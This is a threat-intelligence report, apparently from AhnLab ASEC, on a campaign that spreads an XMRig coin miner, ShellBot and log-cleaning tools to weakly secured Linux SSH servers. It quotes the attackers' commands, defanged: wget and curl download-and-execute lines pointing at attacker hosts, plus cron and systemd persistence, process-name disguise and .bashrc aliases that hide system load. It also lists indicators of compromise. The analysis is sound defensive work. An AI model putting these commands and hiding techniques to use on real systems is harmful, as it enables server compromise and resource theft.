Case Study: Distribution of a CoinMiner Targeting Linux SSH Servers via Malware Distribution via Network Transmission

Case Study: Distribution of a CoinMiner Targeting Linux SSH Servers via Malware Distribution via Network Transmission

The AhnLab SEcurity intelligence Center (ASEC) is monitoring attacks targeting poorly managed Linux servers using multiple honeypots. Recently, ASEC identified cases where malware with propagation capabilities was used to install the XMRig CoinMiner.

 

In these attack cases, malware such as ShellBot, MIG LogCleaner, and XHide were used. The threat actors created and used downloaders and propagation malware written in the Go programming language; they also built and used scripts with Shc (Shell Script Compiler). The same threat actors appear to have been carrying out these attacks since at least 2023.

 

1. Attack Case

Scanning and login attempts targeting SSH service honeypots occurred from multiple attack sources. Given that the commands executed after a successful login are similar to the propagation malware discussed later, it is presumed that this attack was also carried out using propagation malware. After a successful login, command execution occurred as follows, which installed the “run” downloader:

 

# (Uname -a|cut -d’ ‘ -f1,2,3,7,11|tr ‘; ‘ ‘ ‘ && cat /proc/cpuinfo|grep name|cut -f2 -d:|uniq -c ; cd /var/tmp ; wget download.Xrpl[.]City/run && chmod +x run && ./Run) | xargs

 

 

2. Malware Analysis

2.1. Attack Cases

2.1.1. Downloader (run)

The “run” downloader malware was written in the Go programming language; when executed, it changes the current user’s password and outputs the result.

 

Figure 1. Changed Password

 

It then downloads “pack.Jpg,” decompresses it, and executes the malware contained within. “Mysql” is an XMRig CoinMiner, and “meta” is malware; it is executed with the file “ranges” (containing the scan range) and the file “pass” (containing the credentials) as arguments.

 

# Wget download.Xrpl[.]City/test/pack.Jpg#
tar xf pack.Jpg#
rm pack.Jpg#
cd pack#
chmod 0755
mysql# .
/Mysql# rm
mysql# chmod 0755 meta#
./Meta scan ranges 22 -p pass#
rm -rf meta ranges pass found.Lst

 

2.1.2. Propagation Malware (meta)

“Meta” is also written in Go and serves as a propagation-focused malware that scans SSH ports and executes commands to install malware upon a successful connection. It runs as follows, scanning the address range specified in “ranges” using the credentials contained in “pass.”

 

# ./Meta scan ranges 22 -p pass

 

Figure 2. Data files used for scanning

 

If the scanning and authentication are successful, command execution occurs to install “mysql,” an XMRig CoinMiner, on the Attack Target server. It also sends the attack results to “hxxp://youpost[.]In/” via an HTTP POST request.

 

# ( Uname -a|cut -d’ ‘ -f1,2,3,7,11|tr ‘\n’ ‘ ‘ && cat /proc/cpuinfo|grep name|cut -f2 -d:|uniq -c ; cd /tmp ; mkdir .ICE-Unix21 ; cd .ICE-Unix21 ; wget download.Xrpl[.]City/mysql > /dev/null && chmod +x mysql && ./Mysql) | xargs

 

2.1.3. XMRig (mysql)

A. Installation Steps

“Mysql” is an XMRig CoinMiner created by a threat actor, with several additional features. First, if it is running with root privileges and the current execution path is not “/etc/ufw/.Dev/oracle-monitor,” it proceeds with the installation process. It copies itself to the paths “/etc/ufw/.Dev/oracle-monitor” and “/dev/shm/.Sys_cache_backup,” and then creates a Systemd Service; the Service file can be found at “/etc/systemd/system/oracle-service.Service.”

 

Figure 3. Registered Service

 

B. Watchdog Mode

Malware executed from the “/etc/ufw/.Dev/oracle-monitor” path acts as a watchdog, periodically checking whether “/dev/shm/.Sys_cache_backup” exists and downloading it if it does not. This is presumed to be because files located in the “/dev/shm/” path are deleted after a reboot.

 

# Curl -k -s -L -o /dev/shm/.Sys_cache_backup hxxp://download.Xrpl[.]City/mysql || wget -q -O /dev/shm/.Sys_cache_backup hxxp://download.Xrpl[.]City/mysql

 

It then copies the “/dev/shm/.Sys_cache_backup” file to the “/var/tmp/.Sys_cache_<RANDOM>” path and adds it to the cron job.

 

# Cp -f /dev/shm/.Sys_cache_backup /var/tmp/.Sys_cache_<RANDOM> && chmod +x /var/tmp/.Sys_cache_<RANDOM>
(crontab -l 2>/dev/null | grep -v ‘.Sys_cache_’; echo ‘@reboot /var/tmp/.Sys_cache_<random>’) | crontab –

 

C. CoinMiner Mode

Once the above process is complete, the program forks itself to perform coin mining. The command-line arguments are specified as follows, and five mining pool addresses are used.

 

  • XMRig command-line arguments: -u smart –tls –donate-level=0 –null-hash-report –no-color -o sad[.]Lat:80 -o 192.3.9[.]34:80 -O 172.245.81[.]188:80 -O 146.19.213[.]82:80 -O 23.94.137[.]96:80

 

Mining pool addresses
Sad[.]Lat:80
192.3.9[.]34:80
172.245.81[.]188:80
146.19.213[.]82:80
23.94.137[.]96:80

Table 1. List of Mining Pool Addresses

 

For reference, the lock files used by the newly created process responsible for mining and the process responsible for the watchdog to prevent concurrent execution are as follows.

 

  • Agent Lock File: /dev/shm/.Agt.Lck
  • Miner Lock File: /dev/shm/.Mnr.Lck

 

In addition, the list of legitimate processes as follows is used to disguise the process names:

 

  • “/Usr/sbin/irqbalance”
  • “/Usr/lib/systemd/systemd-logind”
  • “/Usr/bin/dbus-daemon –system”
  • “/Usr/sbin/acpid”
  • “/Usr/lib/systemd/systemd-udevd”
  • “Kworker/u16:1-events_unbound”
  • “/Lib/systemd/systemd-journald”
  • “/Usr/sbin/cron -f”
  • “/Usr/lib/policykit-1/polkitd”

 

2.2. ShellBot (.b0t)

ShellBot was also distributed from malware distribution servers under the name “.B0t.” ShellBot, also known as PerlBot, is a DDoS bot developed in Perl. It communicates with C&C servers using the IRC protocol and supports various commands that allow it to not only launch DDoS attacks but also perform System Control on infected systems.

 

Malware C&C server Address Channel Address Administrator ID
1 Irc[.]Lat:80 #X X
2 Irc.Undernet[.]Org:6667 #T3st Egeu

Table 2. ShellBot Configuration Information

 

Figure 4. Command Routine of the ShellBot Used in the Attack

 

Note that while ShellBot supports log manipulation commands, the attackers also distributed MIG Logcleaner from the same address.

 

Figure 5. How to Use MIG Logcleaner

 

2.3. CoinMiner

In addition to these, a compressed file named “auto.Jpg” was also found at the download URL. Based on previously disclosed information, it appears that the same threat actor has been distributing CoinMiner since at least 2023. [1] Inside the compressed file are shell scripts written in Shc, scripts used to obfuscate commands, and the XHide and XMRig CoinMiner.

 

Figure 6. Files contained in auto.Jpg

 

2.3.1. Command Obfuscation

“Pot” is a shell script written in Shc. When executed, it moves files responsible for obfuscation to the “/usr/share/terminfo/c/.X/.L/” Path and moves files such as XHide and XMRig to the “/usr/share/terminfo/c/.X/.X/” Path The Path then executes “script” located in the “/.L” Path; “script” modifies users’ “.Bashrc” files to register aliases. For example, during command execution of the “uptime” command, the alias causes the symbolic link “myu” to be executed; “mywu” actually executes a script named “uptime.”

 

Targeted Commands Symbolic Link Name Command Script Name
W Myw Load
Crontab Myc Cron
Top Pot Top
Uptime Myu Uptime
Ls N/A (Alias)
Lsconfig N/A (Alias)

Table 3. Decoy Commands and Files

 

Figure 7. Contents of symlinks and aliases

 

The disguised “crontab” command saves the current crontab output and then continuously displays only past results, while the disguised “w,” “uptime,” and “top” commands set the “load average” value to a fixed number, making it difficult for administrators to check system load. The “ls” and “lsconfig” commands manipulate the output of the “ls” command execution to hide malware. 

 

2.3.3. XHide (h32, H64)

“Pot” executes “myu,” which is written in Shc, in addition to “script.” “Myu” registers a command for command execution of “myw” as a cron job; “myw” checks whether a connection exists to the address “45.88.91[.]151” (The content of “i”), and if not, it executes the “run” script. “Run” is responsible for launching “Discord”—which is XMRig—using the XHide tools “h32” and “h64.”

 

XHide receives the process to be executed along with the name of the process that is used to disguise the execution as an argument. It then sets argv[0] to the argument it received when executing the target process; consequently, XMRig runs under the name “[kworker/u257:2].”

 

Figure 8. XHide and the execution script

 

2.3.4. XMRig (Discord)

“Discord” is a variant created by a threat actor; it can accept a mining pool address as an argument, but if none is provided, it uses the configuration information stored internally.

 

  • Mining Pool #1: sad[.]Lat:80
  • Mining Pool #2: time.Justnames[.]In:80
  • Wallet #2: “46Yoqzc2n4fQ78s1hbwUePRCSGiQgjUNMAEsWV2mV95tDWRqevJZ38K6GWWzLKc526CvqeVqaazsDYi8gjVSfouRDYrdZnC”
  • Password #2: “x”

 

3. Conclusion

Recently, cases have been identified where various types of malware—including CoinMiner, propagation malware, and ShellBots—are being installed on poorly managed Linux servers. If a CoinMiner is installed, it uses the system’s resources to mine Monero for the threat actor; the threat actor can then use the co-installed ShellBot to perform various malicious behaviors, such as installing additional malware or engaging in Information Theft.

 

Administrators must use passwords that are difficult to guess and change them periodically to protect Linux servers from brute force attacks and dictionary attacks, and must apply the latest version of the Vulnerability Patch to prevent attacks exploiting vulnerabilities. Also, security products such as firewalls should be used for servers that are publicly accessible from the outside to implement access control for threat actors. Finally, care must be taken to update V3 to the latest version to prevent malware infections.

 

MD5

0d01bd11d1d3e7676613aacb109de55f
0fde38c0cfa5e5bf8e6ac2a6be0232b7
161d62e4b7ab39f677e7a6828039ef79
2fcad1ae4a29ddb3862f3674065e7433
3565360c4102e152852976effc9aab85
URL

http[:]//download[.]xrpl[.]city/[.]b0t
http[:]//download[.]xrpl[.]city/auto/auto[.]jpg
http[:]//download[.]xrpl[.]city/auto/mig
http[:]//download[.]xrpl[.]city/run
http[:]//download[.]xrpl[.]city/test/pack[.]jpg
FQDN

irc[.]lat
sad[.]lat
time[.]justnames[.]in
youpost[.]in
IP

143[.]20[.]185[.]252
146[.]19[.]213[.]82
172[.]245[.]81[.]188
185[.]242[.]3[.]57
192[.]3[.]9[.]34

Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.